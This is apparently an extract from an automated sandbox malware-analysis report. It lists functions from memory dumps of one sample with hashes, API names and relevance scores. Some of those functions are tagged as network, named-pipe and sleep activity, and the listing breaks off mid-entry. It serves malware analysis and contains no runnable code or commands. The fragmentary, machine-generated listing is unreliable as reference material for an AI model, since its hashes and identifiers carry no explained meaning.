                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: $<
                    • API String ID: 0-428540627
                    • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                    • Instruction ID: 029e6c0c50f8178ac7a0873f28322fe44d81e9b0db15bd0f8f991eaa75d97d41
                    • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                    • Instruction Fuzzy Hash: DE92D1B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04
                    Function 001CC397 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ailure #%d - %s$e '
                    • API String ID: 0-4163927988
                    • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                    • Instruction ID: ec6c28a2629b973ec245a2b5201f0cb2fca8ea9cd88e4a8d25ed745c8d90d11e
                    • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                    • Instruction Fuzzy Hash: A7510AB6214A508BD714CB09E4E076AB7E1F3CCB94F84561AE38B8B768DB3CD545CB40
                    Function 0068DBF0 Relevance: .6, Instructions: 617COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                    • Instruction ID: bc1ccaeb1530266df738040eaae3fae955189e00e07f680a2e6a2761b34d835d
                    • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                    • Instruction Fuzzy Hash: 7E5250B22149458BD708CB1CE4A173AB7E2F3C9B80F44852AE7978BB99CE3DD555CB40
                    Function 001CCFF0 Relevance: .6, Instructions: 617COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                    • Instruction ID: 82b5d1063a700ef63de224473fde504350dfbea355db83ab48aaa914c7c492b6
                    • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                    • Instruction Fuzzy Hash: 235241B221898587D708CB1CE4A177AB7E1F3C9B80F44852AE79B8B799CE3DD554DB00
                    Function 0068D280 Relevance: .6, Instructions: 592COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                    • Instruction ID: 5164de9d090b26616ad0d3930c8619f64b1833a30633e82543ad9ecf93fad533
                    • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                    • Instruction Fuzzy Hash: 485255B22145808BD708CF1DE4A173AB7E2F3C9B80F44852AE7968BB99CA3DD555CF40
                    Function 001CC680 Relevance: .6, Instructions: 592COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                    • Instruction ID: ce355b0243cb639f74432b96568eac3b2256156551a439938dfd84188c558197
                    • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                    • Instruction Fuzzy Hash: CA5240B22149818BD708CF1DE4A177AB7E1F3C9B80F44852AE78A8B799CA3DD545CF40
                    Function 0066A280 Relevance: .4, Instructions: 404COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free
                    • String ID:
                    • API String ID: 1294909896-0
                    • Opcode ID: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                    • Instruction ID: 97788dc11d1859d5af95f783d0f149c7900d8f14816fea1324a533bb0f57b2cf
                    • Opcode Fuzzy Hash: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                    • Instruction Fuzzy Hash: ACE1D776318A4296DB20CBA5E4902AE67B3F795788F904115EF4DA7708EF39CE06CF41
                    Function 001A9680 Relevance: .4, Instructions: 404COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free
                    • String ID:
                    • API String ID: 1294909896-0
                    • Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                    • Instruction ID: 0e5a797c056a3b603dc5714ecbf7d852c9887fbf52f5745a24cee88d7c1c311a
                    • Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                    • Instruction Fuzzy Hash: 65E1D87A718A4296DF30DB25E4906AE73A1F7AA798F900115EF4D87748EF38CD85CB40
                    Function 001ACE3C Relevance: .4, Instructions: 374COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                    • Instruction ID: 478000ad0292b6d07a9389f9cf01eca55c7dab24efc3bc0c4dde27ee49546022
                    • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                    • Instruction Fuzzy Hash: D4E19CB6B10B4187EB24CB35E8413AA63A2F799795F488125DB8F97B51EF3CE485C340
                    Function 00669D6C Relevance: .4, Instructions: 367COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free
                    • String ID:
                    • API String ID: 1294909896-0
                    • Opcode ID: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                    • Instruction ID: a68336142a694b4ea7778f662b1399bda95fa39f36c900c5556e207a4f108332
                    • Opcode Fuzzy Hash: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                    • Instruction Fuzzy Hash: 6ED1D572304A4292DF20DBA5D4902EEA766F794798F900116EF4E97718EF36CE46CB40
                    Function 001A916C Relevance: .4, Instructions: 367COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free
                    • String ID:
                    • API String ID: 1294909896-0
                    • Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                    • Instruction ID: d57bf8e47affcda77c628be205ea94685852170c192f6ea003444fb5114afa0b
                    • Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                    • Instruction Fuzzy Hash: 1ED1197B704B4292DF20DF65D8902AE6761FBE6798F900012EF4E97658EF34C986C740
                    Function 001B0334 Relevance: .2, Instructions: 163COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                    • Instruction ID: 84848dc8c9b8eb3aba007217a0bbcd6b803f8d12ccf809fb5b860898a47fbc9a
                    • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                    • Instruction Fuzzy Hash: 37617B32714B40D6EB249F62E88439E73E1F79CB94F11512AEA4E83B24DF79C995CB40
                    Function 0068CF97 Relevance: .1, Instructions: 134COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                    • Instruction ID: 7bf834dff18ef2d97432191af032f825d37cd7e6b1fb4cc17482811a90c83697
                    • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                    • Instruction Fuzzy Hash: D1510CB6214A508BD754CB0DE4A072AB7E2F3CCBD4F84521AE38B87B68DA3DD555CB40
                    Function 00692020 Relevance: .0, Instructions: 37COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                    • Instruction ID: c18a84c296884c2148f3584f8dcdcb74ce16d9512609834e75fb3b08a9be0ab6
                    • Opcode Fuzzy Hash: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                    • Instruction Fuzzy Hash: 9EF0FFD7E1DAE26ADB2346640C7D1982F57A4B2A2134DC14F8B8053F93A4060C01D312
                    Function 004542E4 Relevance: .0, Instructions: 13COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                    • Instruction ID: 6df1996fe5ab077fac6f5f648561be467765c73faf68bb16cd4171b126be2ea7
                    • Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                    • Instruction Fuzzy Hash: 60D0C7C7F5DFD096D32281A40C6A0692F91B5F291535E818FAE4497397B40C1D4D5315
                    Function 00692630 Relevance: .0, Instructions: 13COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                    • Instruction ID: 539d35eff73e93ac76602df4a068df1f8cc5d4c668e64a5cd509f388140b9171
                    • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                    • Instruction Fuzzy Hash: 44D05EFBE1DBD21BEB6382284C3D2882F66A162A2074C408F878007FA3E44A1801C311
                    Function 00692050 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                    • Instruction ID: c624cead7d371148b89316b008a246588d0c5e32bc8caaeb701ddc815d516811
                    • Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                    • Instruction Fuzzy Hash: B1C04C57A14AD1579B125A15087A5942B57E5D3D3238A82998D5183E47900A5C17E311
                    Function 006924F0 Relevance: .0, Instructions: 10COMMONLIBRARYCODE
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                    • Instruction ID: 8009e9f2c8603c0aa392f075b10aaf32735fc7346bb9e3a3e5ffbe436e7b62eb
                    • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                    • Instruction Fuzzy Hash: 60C012DBE1DEC15AE72342544C7509F3ED694F2D1030F4046CF4402753A1460C106251
                    Function 00402F62 Relevance: .0, Instructions: 6COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113672098.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113715440.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113736878.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.4113770648.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yZah650lHL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                    • Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
                    • Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                    • Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C
                    Function 00692078 Relevance: .0, Instructions: 2COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                    • Instruction ID: e1caecb6445a2499f8d0cd7f9dcdff8d8002f52e01be10325dabbee32111e1e2
                    • Opcode Fuzzy Hash: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                    • Instruction Fuzzy Hash: 8390025650E3C009CA03D6241C601083F60B08290038B408B838042BC3D44C0508C322
                    Function 00676BE0 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: acceptioctlsocket$closesockethtonlselect
                    • String ID:
                    • API String ID: 2003300010-0
                    • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                    • Instruction ID: 3a22ab2671ea9756bc4af0d6e732f6acd978155fc56be1d3b0b411975531676c
                    • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                    • Instruction Fuzzy Hash: 2D919932710A919BDB60DF21E9507AD33A6F788B98F008229EB4E47F58DF35C665CB10
                    Function 0066EC04 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 165networksleepCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: _snprintf$CloseHandleHttpInternetRequest$OpenSendSleep
                    • String ID: %s%s$*/*
                    • API String ID: 3787158362-856325523
                    • Opcode ID: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                    • Instruction ID: 4feb4164774b2fa1ebca02c0a566f91f923d055f021e5dab81b1decc33edf96a
                    • Opcode Fuzzy Hash: 74fcd7c73aed85367ed650ea4945df165b3c67cd5a727985712ddaae692fa4ee
                    • Instruction Fuzzy Hash: DC711236300B859AEB50DF65E8903ED37A2FB88788F504126EA4D13B68DF3EC51AC710
                    Function 006753E4 Relevance: 18.1, APIs: 12, Instructions: 105pipesleepfileCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$CountNamedPipeTick$CreateDisconnectFileHandleSleepStateWait
                    • String ID:
                    • API String ID: 34948862-0
                    • Opcode ID: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                    • Instruction ID: 6e884b6e5ffd85282d21a74658fbec779b271abfe7c071b39529fe0f93f4ef17
                    • Opcode Fuzzy Hash: fe9bced31039d2455b0d079955692a562236962e25bf66d1b7588840a9b4026e
                    • Instruction Fuzzy Hash: B541AB32704F01D6EB00DB61E8647AD336BE388BA4F908225DE2F47BA4DF79C4668740
                    Function 0067FE10 Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 0067FE36
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • _invalid_parameter_noinfo.LIBCMT ref: 0067FE42
                    • __crtIsPackagedApp.LIBCMT ref: 0067FE53
                    • AreFileApisANSI.KERNEL32 ref: 0067FE62
                    • MultiByteToWideChar.KERNEL32 ref: 0067FE88
                    • GetLastError.KERNEL32 ref: 0067FE95
                    • _dosmaperr.LIBCMT ref: 0067FE9D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: ApisByteCharErrorFileLastMultiPackagedWide__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1138158220-0
                    • Opcode ID: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                    • Instruction ID: cf4228a557fd0e6063c7d3efb5bddca3d5e4dcbb782ebe834ceeb27299a869a2
                    • Opcode Fuzzy Hash: 05425721233f79f79091f3b96a0ee25a442efda7d0ba0e08876b468a33414fe7
                    • Instruction Fuzzy Hash: 2121C132300B4192EB50AF76E81472D77E7AB89FA4F148638EE4947BA6EF3CC5118705
                    Function 0067FF6C Relevance: 18.1, APIs: 12, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                    • String ID:
                    • API String ID: 4099253644-0
                    • Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                    • Instruction ID: f1ad4a06997b4ec404ae2e7d0c08ef39ca67135b9a45530cf5c6cb660311c64c
                    • Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
                    • Instruction Fuzzy Hash: 81316D25301A4085FE44FF51E8607B423A3BB46B90F084629DD5E177A2DF7EC964CB06
                    Function 00677308 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 73networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                    • String ID: d
                    • API String ID: 1257931466-2564639436
                    • Opcode ID: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                    • Instruction ID: e4ac90b84feb32bba891d0a522a0d5fa65501591bdec2923f5d6bc6cc3296ff1
                    • Opcode Fuzzy Hash: ab0c442174a33fd942d7502bed514c8ee7f8710e336f335b2024a32b2463658a
                    • Instruction Fuzzy Hash: 90319C32214B81D6DB20CF62F88479A77A6F788B98F005126EE8D47F28DF79C565CB40
                    Function 001C1B48 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 227COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1a0000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: write_multi_char$write_string$free
                    • String ID:
                    • API String ID: 2630409672-3916222277
                    • Opcode ID: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                    • Instruction ID: 93fad225b0fb5ed7e81c76d3e0d515d3c62d7566275eba2a4f6cc3feda05745d
                    • Opcode Fuzzy Hash: 1c8d6b8a065489df9c71b2e8ea70d157333f6dd13db57c526a3ea5ce9db962ed
                    • Instruction Fuzzy Hash: 1591133374878496EB25CB65E404BAE7B70F7A6794F24100EEF8A57B99DB38C945CB00
                    Function 006771FC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57networksleepCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountTick$ErrorLastSleepselectsend
                    • String ID: d
                    • API String ID: 2152284305-2564639436
                    • Opcode ID: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                    • Instruction ID: efd5a79e5ba5b1a49d4fa8f9e830f0533f845b3e87a0d99194b745c716581666
                    • Opcode Fuzzy Hash: 968d1f127f461a1dbb27dc7435d3ebfca4b5ec6114cfb3c6d112f4c985c4520d
                    • Instruction Fuzzy Hash: 9E219032218A8196D7609F21F88838E7366F784784F504225EBAD47F59DF39C5A4CB44
                    Function 0066FB08 Relevance: 15.1, APIs: 10, Instructions: 91sleepfilepipeCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CountErrorLastSleepTickWrite$BuffersDisconnectFlushNamedPipe
                    • String ID:
                    • API String ID: 3101085627-0
                    • Opcode ID: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                    • Instruction ID: 20c444c17b0549a3d1c7f0f45b5fa1bf5f6f455f3e7158127a932f33e358a413
                    • Opcode Fuzzy Hash: 2fa90bf5de3d4daae598bfc7d95f016883deb1b957d31e82556552939848cc78
                    • Instruction Fuzzy Hash: A7318E32700A45AAEB10DFB9E49439D3377F784B98F514126EE0E97A29DF39C549C780
                    Function 00686E1C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _errno.LIBCMT ref: 00686E4E
                      • Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C
                    • __doserrno.LIBCMT ref: 00686E45
                      • Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC
                    • __doserrno.LIBCMT ref: 00686EAB
                    • _errno.LIBCMT ref: 00686EB2
                    • _invalid_parameter_noinfo.LIBCMT ref: 00686F16
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_660000_yZah650lHL.jbxd
                    Yara matches
                    Similarity
                    • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 388111225-0
                    • Opcode ID: 45b9cdfc7a25f1278b796800b15345f673bb2555b0332f4ab4807a0dfd005840
                    • Instruction ID: 7cfaa5dcb511f5f5a62132100b7c36c6074cf6fcc5c00208eaf73f742b1eeb31
